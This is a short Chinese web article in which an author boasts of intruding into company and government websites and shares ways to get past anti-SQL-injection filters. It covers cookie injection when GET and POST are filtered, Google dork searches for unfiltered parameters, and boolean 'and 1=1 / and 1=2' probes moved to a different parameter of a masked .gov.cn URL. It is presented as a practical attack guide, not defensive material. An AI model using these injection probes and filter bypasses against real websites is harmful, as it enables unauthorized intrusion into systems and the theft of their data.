WEB开发网
开发学院网络安全黑客技术 谈黑客入侵的一些经验 阅读

谈黑客入侵的一些经验

 2009-05-18 16:53:53 来源:WEB开发网   
核心提示:大家是不是经常在入侵的时候碰到防注入的站点呢?难道你看到防注入就放弃了入侵吗?下面我对大家介绍一下我对付防注入的经验,1.我入侵企业网站的时候经常遇到一种防注入,谈黑客入侵的一些经验,防了GET,POST,下面告诉大家个办法 我是屡试不爽啊!比如你要入侵一个站点,他把id=过滤了 可能忘了过滤wid=就是说你要把它所有

大家是不是经常在入侵的时候碰到防注入的站点呢?

难道你看到防注入就放弃了入侵吗?

下面我对大家介绍一下我对付防注入的经验。

1.我入侵企业网站的时候经常遇到一种防注入,防了GET,POST,嘿嘿,但他却忘了cookie。

所以我用cookie注入拿下过无数使用这类防注入代码的站!

大家可以下载这个用常用注入工具进行cookies注入的教程看看http://www.3800hk.com/donghua/c/21008.html

2.如果用cookie注入也对付不了他的防注入,你是不是又要放弃了?

嘿嘿。下面告诉大家个办法 我是屡试不爽啊!

比如你要入侵一个站点,他把id=过滤了 可能忘了过滤wid=

就是说你要把它所有这类连接都找到

在google上搜索 site:www.*********.com inurl:asp

就可以找到

www.*********.com/more.asp?boardid=1

www.*********.com/guest/index.asp?pagenum=6

www.*********.com/view.asp?id=528

他过滤了id 但?boardid=1都不是防注入的,那么你就可以注入了。

3.看看这类

www.**.gov.cn/country.php?id=9&did=18

www.**.gov.cn/country.php?id=9&did=18 and 1=1 正常(或者弹出防注入警告)

www.**.gov.cn/country.php?id=9&did=18 and 1=2 正常(或者弹出防注入警告)

貌似没有漏洞

www.**.gov.cn/country.php?id=9 and 1=1&did=18 正常

www.**.gov.cn/country.php?id=9 and 1=2&did=18 报错

Tags:黑客 入侵 一些

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接